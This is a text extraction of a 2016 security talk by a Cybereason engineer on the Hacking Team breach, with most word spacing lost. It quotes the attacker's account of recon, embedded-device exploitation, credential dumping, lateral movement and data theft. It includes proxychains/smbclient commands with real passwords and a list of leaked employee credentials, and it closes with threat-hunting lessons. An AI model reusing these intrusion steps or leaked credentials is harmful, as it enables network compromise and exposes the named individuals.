Networking 2016-05-24 - Topic 2 - The "Hack Back" - How Hacking Team Became the "Hacked Team" by...

© 2016 Cybereason Inc. All rights reserved.

The“HackBack”HowHackingTeambecame“HackedTeam”

BradGreen,Sr.SalesEngineer


https://youtu.be/R63CRBNLE2o


TheHackersareHacked

HackingTeamdataexfiltrationearlyJuly2015

HackingTeam’stwitteraccount(@hackingteam)ishijackedandpostslinksto400+GBtorrentfileonJuly5,2015

Websitedefacedtoread“HackedTeam”


InsidetheTorrentFileAlloftheexchangeserverdata

AlloftheRCSinstallers+manuals+sourcecode

Importantandprivatedocuments

Screenshotsfromemployeesmachines

EntireGITrepository

PiratedsoftwareandpiratedversionsofOperatingsystems

3fullserverimages(WindowsAttackserver,Androidattackserverandthehelpdesksupportserver)


TTP’s:ARefresher

Tactics:

Procedures:

Uniquewaysormethodsperformedtoaccomplishagoal

Techniques:

Standardized,detailed stepsthatprescribehowtoperformspecifictasks

Theartorskills employedas meanstoaccomplishanend



Tactics

Solerelianceon0-dayexploits

100%endpointPrivilegeescalation

OperationsmirroringFlameCapabilities

Useofnewsandadword services“adhosting”– C&Cusenews-relatedjargon

Single-shotcampaignstiedtoultraspecifictargets

AlgorithmicassessmentoftargetOSbrowser

Switchexploitsinreal-timebasedonendpointassessment

AbilitytoexploitanyWindowsOSXPandAbove

AbilitytoexploitANYMobileOperatingSystemincludingSymbian


Techniques

GainNTAUTHORITY\SYSTEMprivilegesintheSYSTEMshell,thenexecutetheagent.exe fortheRCSclient

Spear-phishingandwaterholedeliverymechanisms

NetworkInjectorandBinaryMelter

Lazylooking404errorpagesusedfornon-intendedtargets

Useof0-dayexploitsforFlashandJava(andSilverlight?)

UseoftheWindowskernelvulnerability(CVE-2015-2387)intheopentypefontmanagermodule(ATMFD.dll)— canbypasssandboxmitigationmechanism

UseofUEFIBIOSRootkittokeepRemoteControlSystemagentpersistent


NetworkInjector

“. . .a particularly nasty tool that would be plugged into an upstream or ISP backbone. Once active, the network injector would be able to identify the target(s) based on a customer defined rule set and wait for the victim to visit a specific URL, such as YouTube.com. Then, it would automatically redirect the victim to the team’s infection server instead.”

Melter could be used in conjunction with Network injector to “melt” the RCS binary into benign software during download


Procedures

Registered domainsinTelAvivunderthe nameDavidCohen(theIsraeliequivalentof“JohnSmith")

Followinfectionserverprocessbelowforexacttargetexploitation

RequestcloudbasedanonymizingservicepriortoexploitationanddeliverytoevadeattributionusingVirtualPrivateServer


Whodidit?

Singleactortakescredit

http://pastebin.com/raw/GPSHF04A (Spanish)http://pastebin.com/raw/0SNSvyjJ (English)

Pastebin postonApril15th,2016inSpanish(followedbyEnglishtranslation)

PartManifesto

PartDIYGuide

PartPlay-by-Play

CompletelyFascinating


Histhoughtprocess

“Inthenewsweoftenseeattackstracedbacktogovernment-backed hackinggroups("APTs"), becausetheyrepeatedlyusethesametools, leavethesamefootprints, andevenusethesameinfrastructure (domains, emails,etc).They'renegligent becausetheycanhackwithoutlegalconsequences.”

“Ididn'twanttomakethepolice'sworkanyeasierbyrelatingmyhackofHackingTeamwithotherhacksI'vedoneorwithnamesIuseinmyday-to-dayworkasablackhat hacker.So,Iusednewserversanddomainnames,registeredwithnewemails,andpayed forwithnewbitcoinaddresses.Also, Ionlyusedtoolsthatarepubliclyavailable,orthings thatIwrotespecificallyfor thisattack,andIchangedmywayofdoingsomethings tonotleavemyusualforensic footprint.”


Recon- TTPs

“Although itcanbetedious, thisstageisveryimportant, sincethelargertheattacksurface,theeasieritistofindaholesomewhereinit.”

Google

DomainandSubdomain Enumeration

WHOISandReverseLookups

Scanning

“Thecompany'sIDSmightgenerateanalert,butyoudon'thavetoworrysincethewholeinternet isbeingscannedconstantly.”

SocialInfo

Linkedindata.comMetadatafrompublished datafiles


Infiltration

Phishing?

“Ididn'twanttotrytospearphishHackingTeam,astheirwholebusiness ishelpinggovernments spearphish theiropponents, sothey'dbemuchmore likelytorecognizeandinvestigateaspearphishing attempt.”

BuyAccess?

“Thankstohardworking Russiansandtheirexploitkits,trafficsellers,andbotherders,manycompaniesalreadyhavecompromised computers intheirnetworks.AlmostalloftheFortune500,withtheirhugenetworks,havesomebotsalreadyinside.However,HackingTeamisaverysmallcompany,andmostofit'semployeesareinfosec experts, sotherewasalowchancethatthey'dalreadybeencompromised.”


Exploitation

HackingTeamhasarangeofpublicIP:inetnum:93.62.139.32- 93.62.139.47descr:HTpublicsubnet

“Whattheyhadwastheirmainwebsite(aJoomlabloginwhichJoomscan[2]didn'tfindanythingserious),amailserver,acouple routers, twoVPNappliances,andaspamfilteringappliance.”

“So,Ihadthreeoptions: look fora0dayinJoomla,look fora0dayinpostfix,orlookfora0dayinoneoftheembedded devices.”

“A0dayinanembeddeddeviceseemedliketheeasiestoption,andaftertwoweeksofworkreverseengineering, Igotaremoterootexploit.Sincethevulnerabilities stillhaven'tbeenpatched,Iwon'tgivemoredetails...”

“Theworstthingthatcouldhappenwouldbeformybackdoororpost-exploitationtoolstomakethesystemunstableandcauseanemployeetoinvestigate.SoIspentaweektestingmyexploit,backdoor,andpost-exploitation toolsinthenetworksofothervulnerablecompaniesbeforeenteringHackingTeam'snetwork.”


Post-Exploitation/C2/Persistence

“Ididalotofworkandtestingbeforeusing theexploitagainstHackingTeam.Iwroteabackdoored firmware,andcompiledvariouspost-exploitation toolsfor theembedded device.Thebackdoorservestoprotecttheexploit.Usingtheexploit justonceandthenreturning through thebackdoormakesithardertoidentifyandpatchthevulnerabilities.”

1) busybox2) nmap3) Responder.py

The most useful tool to attack Windows networks when you have access tothe internal network but do not have a domain user.

4) Python5) tcpdump6) Dsniff

I wanted to use ettercap, written by Hacking Team's own ALoR and NaGA, but it was hard to compile it for the system.

7) socat

8) screenLike the shell with pty, it wasn't really necessary, but I wanted to feel at home in Hacking Team's

network.

9) a SOCKS proxy server

To use with proxychains to access the internal network with anyanother program.


ExploitationSuccessful

“Nowinsidetheirinternalnetwork, Iwantedtotakealookaroundandthinkaboutmynextstep.IstartedResponder.py inanalysismode(-Atolistenwithoutsendingpoisoned responses), anddidaslowscanwithnmap.”

“JustwhenIwasworried thatthey'dfinallypatchedallof theauthenticationbypassbugs inMySQL[2][3][4][5],newdatabasescameintostylethatlackauthenticationbydesign.Nmap foundafewinHackingTeam'sinternalnetwork:”

“TheywerethedatabasesfortestinstancesofRCS.TheaudiothatRCSrecordsisstoredinMongoDB withGridFS.Theaudiofolder inthetorrent[6]camefromthis.Theywerespyingonthemselveswithoutmeaningto.”

27017 / tcp open MongoDB MongoDB 2.6.5| mongodb-databases:| ok = 1| totalSizeMb = 47547| totalSize = 49856643072...| _ Version = 2.6.5

27017 / tcp open MongoDB MongoDB 2.6.5| mongodb-databases:| ok = 1| totalSizeMb = 31987| totalSize = 33540800512| DATABASES...| _ Version = 2.6.5


InternalReconFindsFruit

“Theirinsecurebackupswerethevulnerability thatopened theirdoors.According totheirdocumentation [1],theiriSCSIdevicesweresupposed tobeonaseparatenetwork,butnmap found afewintheirsubnetwork”

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)...3260 / tcp open iscsi?| iscsi-info:| Target: iqn.2000-01.com.synology: ht-synology.name| Address: 192.168.200.66:3260,0| _ Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)...3260 / tcp open iscsi?| iscsi-info:| Target: iqn.2000-01.com.synology: synology-backup.name| Address: 10.0.1.72:3260,0| Address: 192.168.200.72:3260,0| _ Authentication: No authentication required

“iSCSIneedsakernelmodule, anditwould'vebeendifficult tocompileitfortheembedded system.Iforwarded theportsothatIcouldmount itfromaVPS:”


MounttheNAS

[Alotofcomplicatedworkwithtrafficforwarding andVPS]

“...thedevicefileappears!Wemount it...andfindbackupsofvariousvirtualmachines.TheExchangeserverseemedlikethemostinteresting. Itwastoobigtoodownload, butitwaspossible tomount itremotelytolookforinteresting files:”

$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk$ fdisk -l /dev/loop0/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT

“Whatinterestedmemostinthebackupwasseeingifithadapasswordorhashthatcouldbeusedtoaccesstheliveserver.Iusedpwdump, cachedump,andlsadump [1]ontheregistryhives.lsadump found thepasswordtothebesadmin serviceaccount:”_SC_BlackBerry MDS Connection Service0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........


ExploretheBackups“Iusedproxychains [2]withthesocksserverontheembedded deviceandsmbclient[3]tocheckthepassword:“

proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!’

“Itworked!Thepasswordforbesadmin wasstillvalid,andalocaladmin.Iusedmyproxyandmetasploit's psexec_psh [4]togetameterpreter session.ThenImigratedtoa64bitprocess,ran"loadkiwi"[5],"creds_wdigest", andgotabunchofpasswords, including theDomainAdmin:”


ThePasswordsHACKINGTEAM BESAdmin bes32678!!!HACKINGTEAM Administrator uu8dd8ndd12!HACKINGTEAM c.pozzi P4ssword <---- lol great sysadminHACKINGTEAM m.romeo ioLK/(90HACKINGTEAM l.guerra 4luc@=.=HACKINGTEAM d.martinez W4tudul3spHACKINGTEAM g.russo GCBr0s0705!HACKINGTEAM a.scarafile Cd4432996111HACKINGTEAM r.viscardi Ht2015!HACKINGTEAM a.mino A!e$$andraHACKINGTEAM m.bettini Ettore&Bella0314HACKINGTEAM m.luppi Blackou7HACKINGTEAM s.gallucci 1S9i8m4o!HACKINGTEAM d.milan set!dob66HACKINGTEAM w.furlan Blu3.B3rry!HACKINGTEAM d.romualdi Rd13136f@#HACKINGTEAM l.invernizzi L0r3nz0123!HACKINGTEAM e.ciceri 2O2571&2EHACKINGTEAM e.rabe erab@4HT!

”Many have madefun ofChristianPozzi's weak passwords...””...The reality isthat mimikatz andkeyloggers view all passwords equally.”


AwordonLateralMovement

RemoteMovement:1)psexec Thetriedandtruemethod forlateralmovementonwindows.

2)WMIThemoststealthymethod.TheWMIserviceisenabledonallwindowscomputers,butexceptforservers,thefirewallblocksitbydefault

3)PSRemoting [10]It'sdisabledbydefault,andIdon't recommendenablingnewprotocols. But,ifthesysadmin hasalreadyenabled it,it'sveryconvenient, especiallyifyouusepowershell foreverything (andyoushouldusepowershell foralmosteverything, itwillchange[11]withpowershell 5andwindows10,butfornowpowershell makesiteasytodoeverything inRAM,avoidAV,andleaveasmallfootprint)

4)ScheduledTasksYoucanexecuteremoteprogramswithatandschtasks [5].Itworksinthesamesituationswhereyoucouldusepsexec,anditalsoleavesawellknown footprint [12].

5)GPOIfallthoseprotocolsaredisabledorblockedbythefirewall,onceyou're DomainAdmin, youcanuseGPOtogiveusersaloginscript,installanmsi,executeascheduled task[13],or,likewe'llseewiththecomputerofMauroRomeo(oneofHackingTeam'ssysadmins),useGPOtoenableWMIandopen thefirewall.


Awordon”In-Place”Movement(Changingcontext)

1)TokenStealingOnceyouhaveadminaccessonacomputer, youcanusethetokensoftheotheruserstoaccessresourcesinthedomain.Twotools fordoing thisareincognito [1]andthemimikatz token::*commands [2].

2)MS14-068Youcantakeadvantageofavalidationbug inKerberos togenerateDomainAdmin tickets[3][4][5].

3)PasstheHashIfyouhaveauser'shash,butthey'renotlogged in,youcanusesekurlsa::pth [2]togetaticketfortheuser.

4)ProcessInjectionAnyRATcaninjectitselfintootherprocesses.Forexample,themigratecommand inmeterpreter andpupy [6],orthepsinject [7]commandinpowershell empire.Youcaninjectinto theprocessthathasthetokenyouwant.5)runas Thisissometimesveryuseful sinceitdoesn'trequireadminprivileges. Thecommand ispartofwindows,butifyoudon'thaveaGUIyoucanuse powershell [8].


“Oneofmyfavoritehobbiesishuntingsysadmins”

“Readingtheirdocumentation abouttheirinfrastructure [1],IsawthatIwasstillmissingaccesstosomething important - the"ReteSviluppo", anisolatednetworkwiththesourcecodeforRCS.Thesysadmins ofacompanyalwayshaveaccesstoeverything, soIsearchedthecomputersofMauroRomeoandChristianPozzi toseehowtheyadministertheSviluppo network,andtoseeiftherewereanyotherinterestingsystemsIshould investigate.Itwassimpletoaccesstheircomputers, sincetheywerepartofthewindowsdomainwhereI'dalreadygottenadminaccess.MauroRomeo'scomputerdidn'thaveanyportsopen, soIopened theport forWMI[2]andexecutedmeterpreter [3].Inaddition tokeylogging andscreenscrapingwithGet-KeystrokesandGet-TimeScreenshot, Iusedmany/gather/modules frommetasploit,CredMan.ps1[4],andsearchedfor interesting files[5].Uponseeing thatPozzi hadaTruecrypt volume, Iwaiteduntilhe'dmounted itandthencopiedoffthefiles.”


TheBridge

“WithinChristianPozzi's Truecrypt volume, therewasatextfilewithmanypasswords[1].OneofthosewasforaFullyAutomatedNagios server,whichhadaccesstotheSviluppo networkinorder tomonitor it.I'dfound thebridge Ineeded.Thetextfilejusthadthepassword tothewebinterface,buttherewasa publiccodeexecutionexploit[2](it'sanunauthenticated exploit,butitrequiresthatatleastoneuserhasasessioninitiated, forwhichIusedthepassword fromthetextfile).”


DataExfiltration

“WiththeDomainAdminpassword, Ihaveaccesstotheemail,theheartofthecompany.ICuriously, Ifound abugwithPowershell's datehandling.Afterdownloading theemails,ittookmeanothercoupleweekstogetaccesstothesourcecodeandeverythingelse,soIreturnedeverynowandthentodownload thenewemails.TheserverwasItalian,withdatesintheformatday/month/year. Iused:”-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

“NowthatI'dgottenDomainAdmin, Istartedtodownload filesharesusingmyproxyandthe-Tcoption ofsmbclient, forexample:”

proxychains smbclient '//192.168.1.230/FAE DiskStation' \ -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*’c“Idownloaded theAmministrazione, FAEDiskStation,andFileServer folders inthetorrent likethat.”


WhatitMeans– TTP’sReignSupreme• RecompileHash Values

• ObfuscatorSignatures

• Stolen Credit Card

Domain names

• Botnet, Hacked Server, Hosting

IP Addresses

• Custom developmentTools

• Years of innovationTTPs


WhatitMeans– MITREATT&CKModelAdversarialTactics,Techniques,&CommonKnowledge


WhatitMeans– Hunt!

Sec. Min. Hrs. Days Weeks Months

Damage

Time

Penetration↓

Hackingoperation↓

Breachdetected↓

SpreadRecon DamageC&CBreach

Increasefocusonactivelyhuntingyouradversaryattheendpoint

StaticIOC’simportantbutnotenough– detectattackersbytheirbehavior


you.Thankwww.cybereason.com


InterestingThingsRobustInternalDocumentation


InterestingThingsSilverlightExploit:CVE-2016-0034(JanuaryMS16-006):• PurchasedfromVitaliy Toropov for$45kin2013• Toropov claimsitwaswritten2.5yearsprior• KasperskyresearcherswriteYARArulebasedonPOCcode

fromemail• FirstYARAhitNovember25,2015(compiled July21,2015)


InterestingThings

Atthetimeofthebreach:

tmp_priveschasa0/55onVTMynewsfeeds.info isprettyclean,too

Followingthebreach,dozensofhashesstartedshowinguponVT–likelyduetonumerousgroupsdownloadingandcompilingthecode


InterestingThingsInternalPostingspeculatingthenumberofzero-daysareinplay.-Assumeszero-daypersistsforaverageof312daysbeforedetection-ReferencesStefanFrei(NSSLabsinAustin)

“Freisaidthatinlightofthepresentzero-dayreality,hehasthreepiecesofadviceforC-Levelexecutives:-Assume youarecompromised,andthatyouwillgetcompromisedagain.-Preventionislimited;investinbreachdetectionsothatyoucanquicklyfindandactonanycompromises.-Make sureyouhaveaprocessforproperlyrespondingtocompromiseswhentheydohappen.”

Date post:	09-Apr-2017
Category:	Technology
Upload:	north-texas-chapter-of-the-issa
View:	3,673 times
Download:	0 times

Networking 2016-05-24 - Topic 2 - The "Hack Back" - How Hacking Team Became the "Hacked Team" by...

Technology